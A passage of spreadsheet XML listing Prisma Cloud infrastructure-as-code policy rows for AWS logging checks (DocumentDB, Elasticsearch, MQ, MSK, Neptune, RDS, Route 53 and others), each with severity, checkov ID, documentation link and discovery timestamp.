      <c r="J1246" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-docdb</t>
        </is>
      </c>
      <c r="K1246" t="inlineStr">
        <is>
          <t>AWS DocumentDB logging is not enabled</t>
        </is>
      </c>
      <c r="L1246" t="inlineStr"/>
      <c r="M1246" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1246" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1246" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1246" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1246" t="inlineStr"/>
      <c r="R1246" t="inlineStr"/>
      <c r="S1246" t="inlineStr"/>
      <c r="T1246" t="b">
        <v>0</v>
      </c>
      <c r="U1246" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1246" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-docdb-cluster</t>
        </is>
      </c>
      <c r="W1246" t="inlineStr">
        <is>
          <t>Ensure DocDB Logging is enabled</t>
        </is>
      </c>
      <c r="X1246" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/logging-19</t>
        </is>
      </c>
      <c r="Y1246" t="inlineStr"/>
      <c r="Z1246" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_docdb_cluster"]}</t>
        </is>
      </c>
      <c r="AA1246" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1246" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1246" t="inlineStr">
        <is>
          <t>CKV_AWS_85</t>
        </is>
      </c>
      <c r="AD1246" t="b">
        <v>1</v>
      </c>
      <c r="AE1246" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1246" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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6" t="inlineStr">
        <is>
          <t>0c7e0ca3-8c29-43a8-831b-b561ffb5d996</t>
        </is>
      </c>
      <c r="AI1246" t="inlineStr"/>
      <c r="AJ1246" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1246" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1247">
      <c r="A1247" t="inlineStr"/>
      <c r="B1247" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1247" s="2" t="inlineStr"/>
      <c r="D1247" t="inlineStr"/>
      <c r="E1247" t="inlineStr"/>
      <c r="F1247" t="inlineStr"/>
      <c r="G1247" t="b">
        <v>1</v>
      </c>
      <c r="H12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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1247" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-elasticsearch</t>
        </is>
      </c>
      <c r="K1247" t="inlineStr">
        <is>
          <t>Elasticsearch Domain Audit Logging is disabled</t>
        </is>
      </c>
      <c r="L1247" t="inlineStr"/>
      <c r="M1247" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1247" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1247" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1247" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1247" t="inlineStr"/>
      <c r="R1247" t="inlineStr"/>
      <c r="S1247" t="inlineStr"/>
      <c r="T1247" t="b">
        <v>0</v>
      </c>
      <c r="U1247" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1247" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-elasticsearch-domain,aws-opensearch-domain</t>
        </is>
      </c>
      <c r="W1247" t="inlineStr">
        <is>
          <t>Ensure Elasticsearch Domain Audit Logging is enabled</t>
        </is>
      </c>
      <c r="X1247" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-317</t>
        </is>
      </c>
      <c r="Y1247" t="inlineStr"/>
      <c r="Z1247" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_elasticsearch_domain","aws_opensearch_domain"]}</t>
        </is>
      </c>
      <c r="AA1247" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1247" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1247" t="inlineStr">
        <is>
          <t>CKV_AWS_317</t>
        </is>
      </c>
      <c r="AD1247" t="b">
        <v>1</v>
      </c>
      <c r="AE1247" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1247" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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7" t="inlineStr">
        <is>
          <t>c61a0cdc-c20c-4e7f-bd40-bca8a9d5614e</t>
        </is>
      </c>
      <c r="AI1247" t="inlineStr"/>
      <c r="AJ1247" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1247" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1248">
      <c r="A1248" t="inlineStr"/>
      <c r="B1248" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1248" s="2" t="inlineStr"/>
      <c r="D1248" t="inlineStr"/>
      <c r="E1248" t="inlineStr"/>
      <c r="F1248" t="inlineStr"/>
      <c r="G1248" t="b">
        <v>1</v>
      </c>
      <c r="H12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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1248" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-globalaccelerator</t>
        </is>
      </c>
      <c r="K1248" t="inlineStr">
        <is>
          <t>Global Accelerator does not have Flow logs enabled</t>
        </is>
      </c>
      <c r="L1248" t="inlineStr"/>
      <c r="M1248" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1248" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1248" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1248" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1248" t="inlineStr"/>
      <c r="R1248" t="inlineStr"/>
      <c r="S1248" t="inlineStr"/>
      <c r="T1248" t="b">
        <v>0</v>
      </c>
      <c r="U1248" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1248" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-globalaccelerator-accelerator</t>
        </is>
      </c>
      <c r="W1248" t="inlineStr">
        <is>
          <t>Ensure Global Accelerator has flow logs enabled</t>
        </is>
      </c>
      <c r="X1248" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/logging-16</t>
        </is>
      </c>
      <c r="Y1248" t="inlineStr"/>
      <c r="Z1248" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_globalaccelerator_accelerator"]}</t>
        </is>
      </c>
      <c r="AA1248" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1248" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1248" t="inlineStr">
        <is>
          <t>CKV_AWS_75</t>
        </is>
      </c>
      <c r="AD1248" t="b">
        <v>1</v>
      </c>
      <c r="AE1248" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1248" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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8" t="inlineStr">
        <is>
          <t>3c2e68e0-bf05-48ac-b3e6-0470bb9fffa0</t>
        </is>
      </c>
      <c r="AI1248" t="inlineStr"/>
      <c r="AJ1248" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1248" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1249">
      <c r="A1249" t="inlineStr"/>
      <c r="B1249" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1249" s="2" t="inlineStr"/>
      <c r="D1249" t="inlineStr"/>
      <c r="E1249" t="inlineStr"/>
      <c r="F1249" t="inlineStr"/>
      <c r="G1249" t="b">
        <v>1</v>
      </c>
      <c r="H12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49" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1249" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-instance</t>
        </is>
      </c>
      <c r="K1249" t="inlineStr">
        <is>
          <t>AWS EC2 instance detailed monitoring disabled</t>
        </is>
      </c>
      <c r="L1249" t="inlineStr"/>
      <c r="M1249" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1249" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1249" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1249" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1249" t="inlineStr"/>
      <c r="R1249" t="inlineStr"/>
      <c r="S1249" t="inlineStr"/>
      <c r="T1249" t="b">
        <v>0</v>
      </c>
      <c r="U1249" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1249" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-instance</t>
        </is>
      </c>
      <c r="W1249" t="inlineStr">
        <is>
          <t>Ensure that detailed monitoring is enabled for EC2 instances</t>
        </is>
      </c>
      <c r="X1249" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/ensure-that-detailed-monitoring-is-enabled-for-ec2-instances</t>
        </is>
      </c>
      <c r="Y1249" t="inlineStr"/>
      <c r="Z1249" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_instance"]}</t>
        </is>
      </c>
      <c r="AA1249" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1249" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1249" t="inlineStr">
        <is>
          <t>CKV_AWS_126</t>
        </is>
      </c>
      <c r="AD1249" t="b">
        <v>1</v>
      </c>
      <c r="AE1249" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1249" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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49" t="inlineStr">
        <is>
          <t>d1472058-15fb-461b-92ee-31a651cfe914</t>
        </is>
      </c>
      <c r="AI1249" t="inlineStr"/>
      <c r="AJ1249" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1249" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1250">
      <c r="A1250" t="inlineStr"/>
      <c r="B1250" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1250" s="2" t="inlineStr"/>
      <c r="D1250" t="inlineStr"/>
      <c r="E1250" t="inlineStr"/>
      <c r="F1250" t="inlineStr"/>
      <c r="G1250" t="b">
        <v>1</v>
      </c>
      <c r="H12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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1250" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-mq</t>
        </is>
      </c>
      <c r="K1250" t="inlineStr">
        <is>
          <t>Amazon MQ Broker logging is not enabled</t>
        </is>
      </c>
      <c r="L1250" t="inlineStr"/>
      <c r="M1250" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1250" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1250" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1250" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1250" t="inlineStr"/>
      <c r="R1250" t="inlineStr"/>
      <c r="S1250" t="inlineStr"/>
      <c r="T1250" t="b">
        <v>0</v>
      </c>
      <c r="U1250" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1250" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-mq-broker</t>
        </is>
      </c>
      <c r="W1250" t="inlineStr">
        <is>
          <t>Ensure MQ Broker logging is enabled</t>
        </is>
      </c>
      <c r="X1250" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-10</t>
        </is>
      </c>
      <c r="Y1250" t="inlineStr"/>
      <c r="Z1250" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_mq_broker"]}</t>
        </is>
      </c>
      <c r="AA1250" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1250" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1250" t="inlineStr">
        <is>
          <t>CKV_AWS_48</t>
        </is>
      </c>
      <c r="AD1250" t="b">
        <v>1</v>
      </c>
      <c r="AE1250" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1250" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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0" t="inlineStr">
        <is>
          <t>bbb2b85f-e78c-4202-8f45-7eb40d177b8c</t>
        </is>
      </c>
      <c r="AI1250" t="inlineStr"/>
      <c r="AJ1250" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1250" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1251">
      <c r="A1251" t="inlineStr"/>
      <c r="B1251" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1251" s="2" t="inlineStr"/>
      <c r="D1251" t="inlineStr"/>
      <c r="E1251" t="inlineStr"/>
      <c r="F1251" t="inlineStr"/>
      <c r="G1251" t="b">
        <v>1</v>
      </c>
      <c r="H12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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1251" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-msk</t>
        </is>
      </c>
      <c r="K1251" t="inlineStr">
        <is>
          <t>Amazon MSK cluster logging is not enabled</t>
        </is>
      </c>
      <c r="L1251" t="inlineStr"/>
      <c r="M1251" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1251" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1251" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1251" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1251" t="inlineStr"/>
      <c r="R1251" t="inlineStr"/>
      <c r="S1251" t="inlineStr"/>
      <c r="T1251" t="b">
        <v>0</v>
      </c>
      <c r="U1251" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1251" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-msk-cluster</t>
        </is>
      </c>
      <c r="W1251" t="inlineStr">
        <is>
          <t>Ensure MSK Cluster logging is enabled</t>
        </is>
      </c>
      <c r="X1251" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/logging-18</t>
        </is>
      </c>
      <c r="Y1251" t="inlineStr"/>
      <c r="Z1251" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_msk_cluster"]}</t>
        </is>
      </c>
      <c r="AA1251" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1251" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1251" t="inlineStr">
        <is>
          <t>CKV_AWS_80</t>
        </is>
      </c>
      <c r="AD1251" t="b">
        <v>1</v>
      </c>
      <c r="AE1251" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1251" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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1" t="inlineStr">
        <is>
          <t>24e0785e-0e5e-43db-95d3-3744d810d98b</t>
        </is>
      </c>
      <c r="AI1251" t="inlineStr"/>
      <c r="AJ1251" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1251" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1252">
      <c r="A1252" t="inlineStr"/>
      <c r="B1252" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1252" s="2" t="inlineStr"/>
      <c r="D1252" t="inlineStr"/>
      <c r="E1252" t="inlineStr"/>
      <c r="F1252" t="inlineStr"/>
      <c r="G1252" t="b">
        <v>1</v>
      </c>
      <c r="H12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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1252" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-neptune</t>
        </is>
      </c>
      <c r="K1252" t="inlineStr">
        <is>
          <t>Neptune logging is not enabled</t>
        </is>
      </c>
      <c r="L1252" t="inlineStr"/>
      <c r="M1252" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1252" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1252" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1252" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1252" t="inlineStr"/>
      <c r="R1252" t="inlineStr"/>
      <c r="S1252" t="inlineStr"/>
      <c r="T1252" t="b">
        <v>0</v>
      </c>
      <c r="U1252" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1252" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-neptune-cluster</t>
        </is>
      </c>
      <c r="W1252" t="inlineStr">
        <is>
          <t>Ensure Neptune logging is enabled</t>
        </is>
      </c>
      <c r="X1252" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-24</t>
        </is>
      </c>
      <c r="Y1252" t="inlineStr"/>
      <c r="Z1252" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_neptune_cluster"]}</t>
        </is>
      </c>
      <c r="AA1252" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1252" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1252" t="inlineStr">
        <is>
          <t>CKV_AWS_101</t>
        </is>
      </c>
      <c r="AD1252" t="b">
        <v>1</v>
      </c>
      <c r="AE1252" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1252" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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2" t="inlineStr">
        <is>
          <t>a520f182-c20b-4042-95ca-6e0caccf6219</t>
        </is>
      </c>
      <c r="AI1252" t="inlineStr"/>
      <c r="AJ1252" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1252" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1253">
      <c r="A1253" t="inlineStr"/>
      <c r="B1253" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1253" s="2" t="inlineStr"/>
      <c r="D1253" t="inlineStr"/>
      <c r="E1253" t="inlineStr"/>
      <c r="F1253" t="inlineStr"/>
      <c r="G1253" t="b">
        <v>1</v>
      </c>
      <c r="H12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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1253" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-rds</t>
        </is>
      </c>
      <c r="K1253" t="inlineStr">
        <is>
          <t>RDS Cluster audit logging for MySQL engine is disabled</t>
        </is>
      </c>
      <c r="L1253" t="inlineStr"/>
      <c r="M1253" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1253" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1253" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1253" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1253" t="inlineStr"/>
      <c r="R1253" t="inlineStr"/>
      <c r="S1253" t="inlineStr"/>
      <c r="T1253" t="b">
        <v>0</v>
      </c>
      <c r="U1253" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1253" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-rds-cluster</t>
        </is>
      </c>
      <c r="W1253" t="inlineStr">
        <is>
          <t>Ensure that RDS Cluster audit logging is enabled for MySQL engine</t>
        </is>
      </c>
      <c r="X1253" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-325</t>
        </is>
      </c>
      <c r="Y1253" t="inlineStr"/>
      <c r="Z1253" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_rds_cluster"]}</t>
        </is>
      </c>
      <c r="AA1253" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1253" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1253" t="inlineStr">
        <is>
          <t>CKV_AWS_325</t>
        </is>
      </c>
      <c r="AD1253" t="b">
        <v>1</v>
      </c>
      <c r="AE1253" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1253" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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3" t="inlineStr">
        <is>
          <t>5d32450c-7a3c-4164-93b6-1b7f6e6f94a2</t>
        </is>
      </c>
      <c r="AI1253" t="inlineStr"/>
      <c r="AJ1253" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1253" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1254">
      <c r="A1254" t="inlineStr"/>
      <c r="B1254" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1254" s="2" t="inlineStr"/>
      <c r="D1254" t="inlineStr"/>
      <c r="E1254" t="inlineStr"/>
      <c r="F1254" t="inlineStr"/>
      <c r="G1254" t="b">
        <v>1</v>
      </c>
      <c r="H12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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1254" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-rds</t>
        </is>
      </c>
      <c r="K1254" t="inlineStr">
        <is>
          <t>RDS Cluster log capture is disabled</t>
        </is>
      </c>
      <c r="L1254" t="inlineStr"/>
      <c r="M1254" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1254" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1254" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1254" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1254" t="inlineStr"/>
      <c r="R1254" t="inlineStr"/>
      <c r="S1254" t="inlineStr"/>
      <c r="T1254" t="b">
        <v>0</v>
      </c>
      <c r="U1254" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1254" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-rds-cluster</t>
        </is>
      </c>
      <c r="W1254" t="inlineStr">
        <is>
          <t>Ensure that RDS Cluster log capture is enabled</t>
        </is>
      </c>
      <c r="X1254" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-324</t>
        </is>
      </c>
      <c r="Y1254" t="inlineStr"/>
      <c r="Z1254" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_rds_cluster"]}</t>
        </is>
      </c>
      <c r="AA1254" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1254" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1254" t="inlineStr">
        <is>
          <t>CKV_AWS_324</t>
        </is>
      </c>
      <c r="AD1254" t="b">
        <v>1</v>
      </c>
      <c r="AE1254" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1254" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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4" t="inlineStr">
        <is>
          <t>5db24d39-d55e-412b-9ed8-63cfcc95f543</t>
        </is>
      </c>
      <c r="AI1254" t="inlineStr"/>
      <c r="AJ1254" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1254" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1255">
      <c r="A1255" t="inlineStr"/>
      <c r="B1255" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1255" s="2" t="inlineStr"/>
      <c r="D1255" t="inlineStr"/>
      <c r="E1255" t="inlineStr"/>
      <c r="F1255" t="inlineStr"/>
      <c r="G1255" t="b">
        <v>1</v>
      </c>
      <c r="H12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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1255" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-rds</t>
        </is>
      </c>
      <c r="K1255" t="inlineStr">
        <is>
          <t>RDS instances have performance insights disabled</t>
        </is>
      </c>
      <c r="L1255" t="inlineStr"/>
      <c r="M1255" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1255" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1255" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1255" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1255" t="inlineStr"/>
      <c r="R1255" t="inlineStr"/>
      <c r="S1255" t="inlineStr"/>
      <c r="T1255" t="b">
        <v>0</v>
      </c>
      <c r="U1255" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1255" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-rds-cluster-instance,aws-db-instance</t>
        </is>
      </c>
      <c r="W1255" t="inlineStr">
        <is>
          <t>Ensure that RDS instances have performance insights enabled</t>
        </is>
      </c>
      <c r="X1255" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-353</t>
        </is>
      </c>
      <c r="Y1255" t="inlineStr"/>
      <c r="Z1255" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_rds_cluster_instance","aws_db_instance"]}</t>
        </is>
      </c>
      <c r="AA1255" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1255" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1255" t="inlineStr">
        <is>
          <t>CKV_AWS_353</t>
        </is>
      </c>
      <c r="AD1255" t="b">
        <v>1</v>
      </c>
      <c r="AE1255" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1255" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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5" t="inlineStr">
        <is>
          <t>3d08fe94-01cc-4a5e-92b4-68d1a7c15231</t>
        </is>
      </c>
      <c r="AI1255" t="inlineStr"/>
      <c r="AJ1255" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1255" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1256">
      <c r="A1256" t="inlineStr"/>
      <c r="B1256" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1256" s="2" t="inlineStr"/>
      <c r="D1256" t="inlineStr"/>
      <c r="E1256" t="inlineStr"/>
      <c r="F1256" t="inlineStr"/>
      <c r="G1256" t="b">
        <v>1</v>
      </c>
      <c r="H12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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1256" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-route53</t>
        </is>
      </c>
      <c r="K1256" t="inlineStr">
        <is>
          <t>Domain Name System (DNS) query logging is not enabled for Amazon Route 53 hosted zones</t>
        </is>
      </c>
      <c r="L1256" t="inlineStr"/>
      <c r="M1256" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1256" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1256" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
